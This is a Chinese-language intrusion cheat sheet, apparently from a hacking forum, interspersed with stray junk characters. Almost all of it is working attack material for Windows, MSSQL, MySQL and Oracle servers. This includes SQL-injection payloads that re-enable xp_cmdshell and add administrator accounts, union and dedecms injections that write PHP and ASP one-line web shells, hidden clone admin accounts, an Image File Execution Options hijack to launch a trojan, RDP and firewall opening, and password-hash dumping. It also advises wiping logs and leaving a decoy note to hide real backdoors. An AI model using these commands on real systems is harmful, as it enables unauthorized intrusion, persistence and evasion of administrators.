1 `0 z7 ~& g8 v' A* W4 F: `
1.net user administrator /passwordreq:no( }/ B" _' o1 b9 O l3 g) [% l
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了% Z0 d1 u: y- ]
2.比较巧妙的建克隆号的步骤7 j+ k S3 O( ]
先建一个user的用户4 M2 h. d8 C6 o3 r( [" w
然后导出注册表。然后在计算机管理里删掉
! _' {9 j2 a( R0 I9 J在导入,在添加为管理员组
, r' y( s+ c- W8 S. X3.查radmin密码
8 Y% E1 I. ~3 V( freg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg( S3 |5 d @& g2 a1 N
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]* e+ _1 T: i4 t2 Z8 |
建立一个"services.exe"的项 U" O! d7 I X. n6 J
再在其下面建立(字符串值)5 `+ r7 ]5 }0 P+ ?- z
键值为mu ma的全路径5 s Q, ^$ S- E
5.runas /user:guest cmd
, ^" B3 Z/ W. v$ d, S9 Z测试用户权限!
8 d( P3 e _+ r5 r/ S6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
1 z+ G: Y* n6 N8 [% w9 P7.入侵后漏洞修补、痕迹清理,后门置放:
5 `% D5 Y; ?9 A基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
# s, i3 y7 d' [* n, t; U8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
) G- |% Q3 W1 v: F9 R O( c* q6 \% u
for example
' Z* n# E6 M0 @, ~/ ]6 ]
1 G4 h' V. a3 _* t) kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add') Z8 h8 K& L2 x5 \& E
: Z# @. D5 x* @8 z/ A! ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
. ]& W0 V& }6 V H% i% H% y9 B" r
' L, A' U2 s, ^& N2 B9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
9 w7 U5 c6 S- K) l/ V# V1 z如果要启用的话就必须把他加到高级用户模式
, o2 O+ ?/ \$ k可以直接在注入点那里直接注入
: }" \9 F) ~/ _' ^id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--8 j$ x, p/ s$ ~( V
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
6 L) Z( O2 f4 T% r* y. W* l6 R或者
+ X/ e' z1 a8 B; d7 H5 ]sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'2 O) ^. f8 s( a( y
来恢复cmdshell。" C C& q( `6 j7 N& X
& q r' S2 u" J$ \分析器
1 H- v0 W& c1 ]6 G& @. }1 aEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--3 k& A0 V. R9 x$ `/ ]$ X! z2 A9 k
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
/ m/ r, _" K5 i3 ]$ l& v/ \2 O10.xp_cmdshell新的恢复办法7 p9 W1 Q. M$ g# k4 U9 R7 c
xp_cmdshell新的恢复办法
' @* `& N2 @( a' U9 g扩展储存过程被删除以后可以有很简单的办法恢复:8 ?" n+ e' H2 j! V
删除& R6 {. V: w, B w; ]$ f
drop procedure sp_addextendedproc) B7 h3 U1 U' d6 B* [6 |9 C
drop procedure sp_oacreate6 ^& k+ R' S- d
exec sp_dropextendedproc 'xp_cmdshell'1 p! `3 T1 n, G0 s# K" J! b, {7 Z1 O
3 Y4 p3 F" R5 m! f) \$ Q, g# z2 h
恢复
! i) |7 T2 N3 c3 [1 Y( ydbcc addextendedproc ("sp_oacreate","odsole70.dll")! m" O- A- ]' z+ j( w
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")3 W* b7 @4 h% g1 a
- s/ a! \ u) K' r# H1 f7 N
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
' h: {# [" X6 V' X; S
% F3 U' m K7 B2 ?- \ a# m- v" T-----------------------------5 I/ S$ C) t! F6 n4 v6 m' ~
" N+ H) S6 n- X$ D7 j删除扩展存储过过程xp_cmdshell的语句:
/ K! W. S7 I0 \2 A) {exec sp_dropextendedproc 'xp_cmdshell'' {/ H0 T- X7 a5 P2 U0 y
, v x% G9 I) k7 D/ k- L% y恢复cmdshell的sql语句
; N7 r* E# C7 |3 _& j7 F& s8 mexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'; Y |7 U7 ~* V* ?* L
: J1 ~0 O) K {$ Q2 E
{; u# x/ Q/ r( d4 E开启cmdshell的sql语句% Y8 y( H0 i. M
6 {5 D' w- c& m1 @8 z6 P/ |3 w9 g
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'6 [9 t" h: l C# }1 r- g r
) c0 n8 @0 [6 s' V0 y, w! c) W判断存储扩展是否存在2 ^+ X+ C# m' m' H. i1 F
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
6 \7 P6 y5 C! N' K返回结果为1就ok7 J; N# A0 H5 y- G5 R2 E0 {( x
6 u9 W% e2 u1 l" l7 w
恢复xp_cmdshell7 {, n D% T" h$ @% D, k" {5 I
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'+ q- i- K3 d8 `! D3 v8 k2 @
返回结果为1就ok5 Y! P9 J! j: y! L& v$ f) Y
, n7 x& \1 f/ a& E3 q6 w! w# D, Z4 a否则上传xplog7.0.dll- p3 q, _( O5 I
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'4 I9 V* o7 G! P# b2 V3 C2 G* h
! r. Y; R0 `4 l8 U
堵上cmdshell的sql语句
+ q' Z2 V5 F3 T4 L5 z1 |sp_dropextendedproc "xp_cmdshel' g* D$ ~! L# ^4 c9 ^* E
-------------------------
+ T8 ^" Y0 D% q6 b$ n! G清除3389的登录记录用一条系统自带的命令:- I8 _; b" q8 m% h
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f7 t# f2 c5 }/ t% U3 J
/ Q9 \' q6 p1 h) h3 [) p# Z然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件# x; {, I; o4 x/ A6 Y$ h9 o- I
在 mysql里查看当前用户的权限
8 H3 f) m& T6 t. S9 M Vshow grants for 4 T* a6 v$ f I+ t) D# h- o' J
1 W: Z: q2 P' F以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。" J$ ~/ Y! m3 O4 T ~
0 _. c$ L7 w2 }8 j3 K4 i/ {
7 M' B6 Q. G$ `; nCreate USER 'itpro'@'%' IDENTIFIED BY '123';) t$ M& h) g4 k& m
, P0 {) J" b r3 f# k
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
# f' J3 A; E) `1 \! t7 [3 |6 O& a+ {7 W0 M/ X. \. K
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0/ x: Z5 o6 o1 w' |# s$ Y) z
. F2 ]9 b2 S3 w CMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;9 ]* B7 D: ^" s" g! E
( w8 n2 { V% H2 O& v+ V
搞完事记得删除脚印哟。
- o* [" }: a, s9 Y4 x* W. @2 K, [
. `0 }2 J9 m$ q. p: bDrop USER 'itpro'@'%';
& M4 t* H) y5 y: [) I: l) @( ] z/ ~$ k* K% L: }+ j c
Drop DATABASE IF EXISTS `itpro` ;
9 o, z7 o! t2 R" Z+ J" ]' }! L1 i* s e; V6 ^5 b
当前用户获取system权限
! |: Z* n& \, m3 }3 isc Create SuperCMD binPath= "cmd /K start" type= own type= interact
5 E4 r; m) [8 r D: V% r1 Bsc start SuperCMD: f' v, }* @0 V# w. n% c% {0 l' @
程序代码+ p" h; A; X! B5 ~2 s9 J( \
<SCRIPT LANGUAGE="VBScript">
~- w1 J2 S- k$ j' n) M; O+ oset wsnetwork=CreateObject("WSCRIPT.NETWORK")
9 f6 U* M c& u' B1 r- yos="WinNT://"&wsnetwork.ComputerName6 x4 L! S1 R. C j3 ?( t7 d# h
Set ob=GetObject(os)
( q% z3 y% B- p3 @7 c/ MSet oe=GetObject(os&"/Administrators,group")/ {: `/ T/ H. X B7 g
Set od=ob.Create("user","nosec")
+ A* k2 K9 B$ X' c2 aod.SetPassword "123456abc!@#"
2 h0 V0 n. T" F+ ?0 U0 _od.SetInfo
& c' y1 u. D' `. [! I. o& e, {Set of=GetObject(os&"/nosec",user)
. D* R4 g. x1 eoe.add os&"/nosec"5 t6 ~% o1 }) X/ |& c1 A4 F
</Script>4 q5 [( k# q4 J5 r; u
<script language=javascript>window.close();</script>% q, Z1 T1 S: z$ C X
+ l* H% {0 W( \
! ^5 w. U$ f/ |
- \2 N @* G* T0 }$ J7 i0 g# @7 F% Z, `. P% N$ Y
突破验证码限制入后台拿shell5 d9 K1 e- g/ ]9 c P
程序代码
! |+ F- D5 L, N' ^REGEDIT4
: f4 i0 ~. L, M' e1 O[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
' T; o- M3 t0 v: o" ~, A4 v"BlockXBM"=dword:00000000: {$ x) {' D) A2 \. y. s9 K
3 {1 Y. L) I; X6 l& ^$ G( l
保存为code.reg,导入注册表,重器IE
& e5 F6 g4 X, ]- ~$ ^/ N% o4 _就可以了) H( ^; @+ C# S) K) b
union写马
8 D4 `2 T0 T8 x: X3 P- }* G程序代码
% _, w3 k, k5 l( o; G3 \( G/ V3 ywww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*& l4 }. K& u8 a" A( l; c; V
$ A; ~0 g/ |( X3 ^% r5 Y4 |! `应用在dedecms注射漏洞上,无后台写马
1 u# l1 M" `0 z- k, M) Q6 k2 Udedecms后台,无文件管理器,没有outfile权限的时候
2 C9 T$ b' c( h! h0 w4 ?& [& R在插件管理-病毒扫描里
6 S) L1 ]# G2 v' e8 e写一句话进include/config_hand.php里
8 v* M- b$ `+ O6 t; ]& _+ U& p9 _程序代码
6 E7 J5 m" C$ A, L5 }3 z- ?1 v>';?><?php @eval($_POST[cmd]);?>
" ~: L9 L) m f" y7 N# L, U$ ?8 B# |) q& e$ a. @- g
2 I/ h. p0 \; O |
如上格式
+ q, ^0 I' v' W h* T7 A
7 ~6 W: `( S, _- Loracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
, x4 S6 }: C/ h, }7 h& Z2 o1 w: L程序代码! l: U, q( K X
select username,password from dba_users;
! a% Y+ O4 o* e9 o7 }" N4 h- G8 }$ q. c# P q d" Y+ e
, Y! d& y3 c! ~# x2 K, o% D" jmysql远程连接用户
1 u$ [% j" s! }& i9 F程序代码
- c: H$ ]$ e$ \" _+ s0 ~% m: S. M) T9 f* z& I8 P1 ?) r
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';! A) `2 p8 e+ R- ]
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION- Y9 x/ O5 w5 a- [4 g+ y7 f! B
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0# _! p0 V- D1 b( d+ l% X
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;0 p8 g! y8 z: y6 z8 u1 }8 S
3 C; ?6 q! l K" W4 E' r$ t a! O8 j* b ]' w
: r+ b- O% O% s! \) S, `! Q
) {+ t4 f4 m/ Hecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00 n: N1 ^* r% l) i, |9 y K
! [ j2 O* w4 C# c1.查询终端端口0 Q3 n T1 ~9 B- \+ O- W% q
$ s/ ^: f0 s3 h& h, \4 Kxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber" c. r0 s" K% `( V' n1 B' t% o8 G* A
( y+ k/ a% H: B( q1 Z
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
- m7 H+ J5 G# E4 r1 v6 Z n" @2 n9 ctype tsp.reg0 W! f2 u( B6 L6 l, P1 {4 |
+ ?$ m! X+ Z/ Z y2.开启XP&2003终端服务
( |) X$ { H/ }# F9 r- J, _* `$ ]% p' K: e! V* S/ p h
" x% _2 H' T/ k% s. y6 R8 _
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f* k8 M I7 ?+ t7 t" S
8 N, A. t: U e
' k @8 S/ W" J: Q+ K$ EREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f6 } Y J5 L) K: Q6 q/ O
1 I% \% R o3 |( o A* ?
3.更改终端端口为20008(0x4E28)
5 D S- k; w: z1 C# u9 w
, Q2 G3 `9 v6 i1 F% v d3 ?REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
7 h( E: q& ~! r& }* d- l2 Y+ q% r4 T L+ L
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
3 ?, Z: K, @: b# p1 ]1 O+ D/ [( W$ x* o/ H
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制4 K6 |0 G+ h: n- P% G1 M
+ K9 U, R# L7 p/ p) O* v
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f6 p9 M7 d5 O/ |$ f2 y
: ^8 C+ k. y* F
9 [: u" V3 c) n8 z9 V. Z5.开启Win2000的终端,端口为3389(需重启)% Z j; r% R8 X4 j& R
# x2 b0 o/ [6 f
echo Windows Registry Editor Version 5.00 >2000.reg 5 [: o* U9 K7 O2 b/ H- O
echo. >>2000.reg0 E+ ]9 L* u% e: ^+ w, d& n0 z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 1 \: F2 Q7 n" }- n* R" I: G
echo "Enabled"="0" >>2000.reg
3 L9 P7 J' G% C! Decho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
! O# q. a6 P+ x6 v$ m" `4 Uecho "ShutdownWithoutLogon"="0" >>2000.reg
8 n$ A% C7 ? cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
. W4 Y: o0 U5 c0 e. ^! w2 `& kecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg % y' {8 F! S" R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
$ l. r" r4 d S+ X) cecho "TSEnabled"=dword:00000001 >>2000.reg / f, ? B8 A) [& ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
' @) F) `& C/ o) v- w) xecho "Start"=dword:00000002 >>2000.reg
: j# [+ T5 f6 q! T Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
) C$ U$ H$ z( ^echo "Start"=dword:00000002 >>2000.reg 1 }7 J0 v% r3 U v) O
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg . ]/ [2 c9 m/ n2 S; r
echo "Hotkey"="1" >>2000.reg - v& S8 n) w& i5 U( f, A/ Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
# ` E. @& X: s# v; c1 f; Becho "ortNumber"=dword:00000D3D >>2000.reg
6 x, e0 @: }2 J4 w$ w! M; S9 L. w9 Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 7 v/ Y9 {' M0 L& E! d
echo "ortNumber"=dword:00000D3D >>2000.reg
2 J4 }0 ^$ Q4 w! b6 A3 Y; s) Y, ^% [. }" Q( d# B6 P+ F9 N& d v5 I
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
4 B4 j% i1 c* M3 H; i/ p8 E( w& Q2 V
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
1 E6 ~/ y# }' f8 l( c* h(set inf=InstallHinfSection DefaultInstall)7 J3 G" i* R9 f1 n! [
echo signature=$chicago$ >> restart.inf
7 N# f# Q% p& n. O* _echo [defaultinstall] >> restart.inf# w- l& j1 a" l! f6 e* k4 m2 P
rundll32 setupapi,%inf% 1 %temp%\restart.inf
9 v* Q9 Z0 y) M! q$ `& v7 C& ~0 ~' P: W" F
9 P! O& c9 T/ P& w9 r4 B, s! B" ^
7.禁用TCP/IP端口筛选 (需重启)
, W" E: g, q0 n
" M7 G- U4 {( [REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f$ e0 s; i+ {+ k- e4 x1 R1 m1 g& C
% B! G4 V9 f8 f8 z: a8.终端超出最大连接数时可用下面的命令来连接
1 t$ N0 e2 k7 f4 J1 T7 E$ W1 W) x" B7 J3 B* D) Y
mstsc /v:ip:3389 /console. `# r3 b) z% [8 T8 y' O
+ B( w! I$ e$ z P- x9.调整NTFS分区权限. B7 Q8 ?6 |" G
0 h" A5 j% E: r/ \! T W+ D7 }1 _cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)9 C5 Z9 g* j& G' w* u* x0 \. B
' v3 ]- ^* d- }1 x6 J/ n# ucacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)9 d/ }, u' j8 ^0 s; c* [' `
1 c5 N X& L6 M3 h------------------------------------------------------
0 ~& P3 {1 ?5 Z8 C7 f" V9 c3389.vbs & |$ F; p; f& C( |* }. I
On Error Resume Next+ a% o$ U- B0 ?: V; ^6 \" I. Y
const HKEY_LOCAL_MACHINE = &H80000002/ W: X; @/ W6 O
strComputer = "."7 P1 X# f1 `; n8 Z% m
Set StdOut = WScript.StdOut/ t4 F- a8 _8 F: O5 ^% y
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_! y$ q' z& `6 @& p
strComputer & "\root\default:StdRegProv")$ G" E5 \5 B, A# U* T: n
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"# Q- v1 @* V+ _0 r
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath! p# N p. w6 M- Q: W
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"* A+ } W& u5 J& H7 c6 _3 w
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
8 f( `" w: U9 w# a4 Z0 S" o* estrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"8 ]; Z( I7 h0 d
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
6 N& W* q# G' t, H6 ?8 |" g- `8 XstrValueName = "fDenyTSConnections"# g; k* T( f9 H6 B# F' I! Q$ C1 L
dwValue = 0
5 B9 F9 z4 J6 x5 L8 t% ?oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue1 Q2 C+ p* Z3 y6 G( r1 r
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"8 V8 N2 x) \7 I6 S8 N* Y- n
strValueName = "ortNumber"$ W5 x/ I( q T( I) F- ^
dwValue = 3389
, s7 X3 I o6 k2 soreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue' _& [9 P0 C' ]! B& I
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"8 B) T; Y% C0 M* `$ O
strValueName = "ortNumber"0 b% F) S3 j! n9 E
dwValue = 3389
9 Q" T/ g! ~4 P" _3 koreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
1 c0 t% y, `: @; }) E9 g9 k7 hSet R = CreateObject("WScript.Shell")
3 Y& q, g" j& d- MR.run("Shutdown.exe -f -r -t 0")
3 }8 E! M2 V7 f g( A# a0 \) P. J" O+ ]. t+ E' S
删除awgina.dll的注册表键值% w/ K: [6 g2 P4 ]; R2 O- F
程序代码) k' U: V- d U( m# ^$ q+ N
/ M% ~9 R" C- ? Q" rreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f1 g- `, W3 D% h
7 g1 W, n- ~& K f/ A
$ {0 e2 r& F& U4 r4 r
; m! o1 r3 H. o1 ?, F5 s/ k
0 t- V/ h# s2 D- m, m- ?程序代码
: c V2 F; H% @7 P( O6 ^' S* @6 Y/ ^HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
: V: e4 S# P) r: Q! \& n& X
8 T* O. S" @/ h4 y. Z1 I设置为1,关闭LM Hash
2 U4 E* A% K- N+ p. w: g
/ G# U+ ]: G; B5 v( ~: e; \: O数据库安全:入侵Oracle数据库常用操作命令( B; Q; ~& _& T/ F6 i" k& V6 @- f1 X6 G
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。1 |) X+ Z7 g7 |- @
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
x& N& s- j- O; D8 b! \2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;) z' C, ], ?8 Q6 _
3、SQL>connect / as sysdba ;(as sysoper)或 e5 a- x0 {, z) K9 _. b- e5 T' P
connect internal/oracle AS SYSDBA ;(scott/tiger)1 a' M) M# w1 }4 @! g: C# M
conn sys/change_on_install as sysdba;
8 P2 Q- i( A) F: \4、SQL>startup; 启动数据库实例
H( U+ F! k2 \% m9 S5、查看当前的所有数据库: select * from v$database;9 B. ?; ]) K- e' P S
select name from v$database;. l+ q w: G: g; o% }6 e7 ` j
6、desc v$databases; 查看数据库结构字段
/ [/ R6 C5 z; T# b7 t( j8 [7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
$ z5 Z& X+ n( c8 N$ _9 ~0 }SQL>select * from V_$PWFILE_USERS;6 Y0 ~7 z. _ w
Show user;查看当前数据库连接用户
% @7 f" U5 z" O6 _8、进入test数据库:database test;
# A# C" `' [0 }% }9、查看所有的数据库实例:select * from v$instance;0 Z7 [) Z0 r! q! Z
如:ora9i
$ r0 Y& d) S# q# t: y/ c10、查看当前库的所有数据表:
( D1 ^8 z4 a" R2 b) nSQL> select TABLE_NAME from all_tables;" [; z$ j2 N5 V! K% H1 `
select * from all_tables;3 N% {1 h: }# F% M; d6 A
SQL> select table_name from all_tables where table_name like '%u%';: u- @: F" Y/ d5 l: ~" y) Z0 v
TABLE_NAME
; x" |2 X6 ]) l, _------------------------------+ V% [/ Z7 g3 h" q9 S
_default_auditing_options_. u2 G9 U% `/ H: U
11、查看表结构:desc all_tables;& |* p! x" H6 h3 G
12、显示CQI.T_BBS_XUSER的所有字段结构:
5 o( s9 ~' |/ ?+ e* s2 s# hdesc CQI.T_BBS_XUSER;# ?' L0 z$ q' k
13、获得CQI.T_BBS_XUSER表中的记录:- T: B* e) i3 P
select * from CQI.T_BBS_XUSER;
: I: p6 \' h9 _7 r5 l14、增加数据库用户:(test11/test)! ~+ W- b; h3 E/ `. `; z. Q- F7 j# m
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;" R# J6 p( z2 x1 v
15、用户授权:
! L+ ?" G: K1 l! O V( O) i6 dgrant connect,resource,dba to test11;
0 i' H; w3 j' c, M# [# qgrant sysdba to test11;
+ D: x: y5 o9 _% U" Fcommit;. W; K' K+ i0 O+ ~! p2 B6 |# U- g0 Z
16、更改数据库用户的密码:(将sys与system的密码改为test.)
3 s* N; ]* z% q: K" u2 lalter user sys indentified by test;
1 a: `2 q* x7 d3 i6 h- o* Kalter user system indentified by test;
4 v3 Y" { H4 J% R
4 H$ A( f, S5 K5 K) @; capplicationContext-util.xml
* m) m- ]! x/ Z gapplicationContext.xml
4 i# ]8 J V! v8 k2 K- O7 d$ Zstruts-config.xml9 j4 B# k) v+ d- O! I& c
web.xml1 H- D7 x5 U0 c' e7 E, u
server.xml; `/ g6 L/ q- m$ y8 S0 F4 }
tomcat-users.xml1 K; q2 m( U- _. r$ T( d0 P& K) W
hibernate.cfg.xml
W$ b, L- \! a+ Q5 ddatabase_pool_config.xml: f1 v; o/ a5 ^" n8 G" g
; a) u" H& @9 ^1 A7 m* I' m3 U/ N; O
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置; |" b, P; v, i' B
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
8 w( y7 @5 u$ `4 F S: H" f\WEB-INF\struts-config.xml 文件目录结构
) t& Q8 y0 k. u0 q9 e* X# J5 Z# ~4 o1 R% I
spring.properties 里边包含hibernate.cfg.xml的名称8 z R1 M, M& ^& E
5 W3 [1 o! H$ c. r, M
3 n, b _$ ~$ TC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
. ?. v9 F6 w0 m9 g( i6 y( b
+ c, Q3 }5 W# g+ e) W! A如果都找不到 那就看看class文件吧。。
- ~& q6 X1 [8 t. s, O
a+ K% J# i# t7 {. H5 m% S测试1:
8 \; M8 F$ b8 A! h0 `SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
S# X9 T( ^1 |7 w4 g5 c
L3 t* c d; n! e' d+ Y, D; [测试2:
! H: }9 q# i5 U. F) ^2 ?6 C& j C6 U L$ K0 {. Z* Z( K
create table dirs(paths varchar(100),paths1 varchar(100), id int)
- T0 b+ ~/ _, X6 [% Y+ y, }2 s( a& e: p
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
( p [ I$ i+ @( R1 [) U1 O4 z) J5 m L: {
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1; |% |8 |- X. f0 ] ^$ r; j8 O
" F/ s6 o. R+ K' y* [: _查看虚拟机中的共享文件:
( _7 i5 C" P/ s. c8 H在虚拟机中的cmd中执行
4 x' }% l* G* x9 E' V\\.host\Shared Folders; _4 k; j w) }4 _. }1 D; Y s7 k
1 O( b! ]! `# `( i! n: p$ J( V
cmdshell下找终端的技巧
8 n) D5 k2 D; c! [) k; ~找终端: 1 T5 V" R. x8 _ B5 i
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 2 [8 f4 ?, n; l# e# h9 R
而终端所对应的服务名为:TermService
( e+ n W$ R3 s9 e4 J& y第二步:用netstat -ano命令,列出所有端口对应的PID值!
. i8 {3 J9 ]1 u: B6 [2 a, E9 B) y 找到PID值所对应的端口
" r# i2 v W, J8 i: O+ F3 L
+ r h& |, E# {8 m; r7 l查询sql server 2005中的密码hash
+ H' d5 b- J. g) H# ^( USELECT password_hash FROM sys.sql_logins where name='sa'& _: H6 g5 Q) @0 [
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
X% v8 P+ F) c2 O2 o+ A; [+ Vaccess中导出shell- R5 a3 c& g+ K) g5 ]8 \
3 p! T! ~6 B# r+ t" p- e中文版本操作系统中针对mysql添加用户完整代码:
2 a# A8 w; C$ m
